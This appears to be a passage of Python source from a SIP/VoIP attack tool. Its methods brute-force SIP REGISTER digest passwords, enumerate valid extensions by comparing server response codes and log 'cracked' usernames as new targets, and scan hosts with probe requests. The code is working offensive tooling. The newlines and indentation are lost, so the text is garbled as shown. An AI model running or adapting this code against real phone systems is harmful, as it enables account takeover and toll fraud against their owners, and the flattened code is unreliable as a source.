def genNextRequest(self): """ Generate next request to fire on target SIP UAS """ if not self._testpktgenerated: self._testpktgenerated = True self.logDebug('sending test request') reqpkt = makeRequest('REGISTER', self._targetip, self._targetport, self._xternalip, self._localport, extension=self._username, cseqnum=1, ) else: localtag = None cseqnum = 1 if len(self._challenges) > 0: try: nextpasswd = self._scaniter.next() except StopIteration: return None self.logDebug('trying password: %s' %nextpasswd) localtag = createTag('%s:%s' %(self._username,nextpasswd), '\xDE\xAD\xBE\xEF') auth = dict() auth['username'] = self._username auth['realm'] = self._realm auth['algorithm'] = self._digestalgorithm if self._reusenonce: auth['nonce'] = self._staticnonce callid = self._staticcallid else: auth['nonce'], callid = self._challenges.pop() auth['proxy'] = self._targetisproxy auth['password'] = nextpasswd cseqnum = 2 else: auth = None callid = None reqpkt = makeRequest('REGISTER', self._targetip, self._targetport, self._xternalip, self._localport, toaddr, fromaddr, extension=self._username, callid=callid, contact=contact, cseqnum=cseqnum, localtag=localtag, auth=auth) return (self._targetip,self._targetport), reqpkt
def genNextRequest(self): """ Generate next request to fire on target SIP UAS """ if self._BADUSERCODE is None: self._nb_test_pkts_generated += 1 self.logDebug("generating test packet #%d for method '%s' .." %(self._nb_test_pkts_generated, self._currentmethod)) nextusername = random.getrandbits(50) else: try: nextusername = self._scaniter.next() except StopIteration: return None toaddr = fromaddr = '"%s"<sip:%s@%s>' %(nextusername,nextusername,self._targetip) contact = 'sip:%s@%s' %(nextusername,self._targetip) reqpkt = makeRequest(self._currentmethod, self._targetip, self._targetport, self._xternalip, self._localport, toaddr, fromaddr, contact=contact, extension=nextusername) return (self._targetip,self._targetport), reqpkt
def genNextRequest(self): try: ip, port, method = self._scaniter.next() except StopIteration: return None reqpkt = makeRequest(method, ip, port, self._xternalip, self._localport, ) return (ip,port), reqpkt
def pktCallback(self, srcaddr, pkt): """ Food is served """ self._targetisalive = True metadata = parsePkt(pkt) if metadata['headers']['To'] is None: # self.logInfo("received failure response: %s" %(metadata['respfirstline'])) return if self._BADUSERCODE is None: """ Perform a test 1st .. to find out what error code is returned for unknown users Quit if weird codes are returned (the SIP UAS must be sick or somethx \L/) """ if metadata['code'] == TRYING \ or metadata['code'] == RINGING \ or metadata['code'] == UNAVAILABLE: pass elif metadata['code'] == OKAY \ or metadata['code'] == NOTALLOWED \ or metadata['code'] == UNSUPPORTED \ or metadata['code'] == NOTIMPLEMENTED \ or metadata['code'] == INEXISTENTTRANSACTION \ or metadata['code'] == NOTACCEPTABLE \ or metadata['code'] == BADREQUEST \ or metadata['code'] == PROXYAUTHREQ \ or metadata['code'] == INVALIDPASS \ or metadata['code'] == AUTHREQ \ or metadata['code'] == TEMPORARILYUNAVAILABLE: self.logWarning("SIP server (fatally) replied test packet with '%s'" %(metadata['respfirstline'])) self.set_currentmethod() else: self.logDebug("ok. server replied test packet with '%s'"%(metadata['respfirstline'])) self._BADUSERCODE = metadata['code'] self.logDebug("setting BADUSERCODE = %s" % self._BADUSERCODE) return match = re.search("^(?P<username>.+?) *?<", metadata['headers']['To']) username = match.group('username').replace('"', '').replace("'", "") if metadata['code'] != self._BADUSERCODE: if username in self._doneusernames: return if (200 <= metadata['code'] < 300) and self._ackenabled: # ACKnowledge all 2XX (success!) responses if metadata['headers']['CSeq'] is None: # self.logDebug("received failure response: %s" %(metadata['firstline'])) return match = re.search("^(?P<cseqnum>[0-9]+?) .+?", metadata['headers']['CSeq']) assert match is not None # XXX dirty cseqnum = match.group('cseqnum') ackpkt = makeRequest('ACK', srcaddr[0], srcaddr[1], self._xternalip, self._localport, extension=username, callid=metadata['headers']['Call-ID'], cseqnum=cseqnum) self.logInfo("received (success) response '%s' for username '%s'" %(metadata['respfirstline'], username)) self.logDebug("sending ACK ..") self.sendto(ackpkt, srcaddr) if metadata['code'] == OKAY \ or metadata['code'] == AUTHREQ \ or metadata['code'] == PROXYAUTHREQ \ or metadata['code'] == INVALIDPASS \ or metadata['code'] == TEMPORARILYUNAVAILABLE: self._doneusernames.append(username) authentication = 'reqauth' if metadata['code'] == OKAY: authentication = 'noauth' self.logInfo("cracked username: %s (response to '%s' request was '%s')" %(username,self._currentmethod,metadata['respfirstline'])) if self._pcallback: self._pcallback.announceNewTarget(targets.TARGET_SIP_USER(ip=srcaddr[0], port=srcaddr[1], ua=metadata['headers']['User-Agent'], user=username, auth=authentication)) else: self.logInfo("received '%s' for username '%s'" %(metadata['respfirstline'], username)) else: self.logInfo("received failure response '%s' for username '%s'" %(metadata['respfirstline'], username)) pass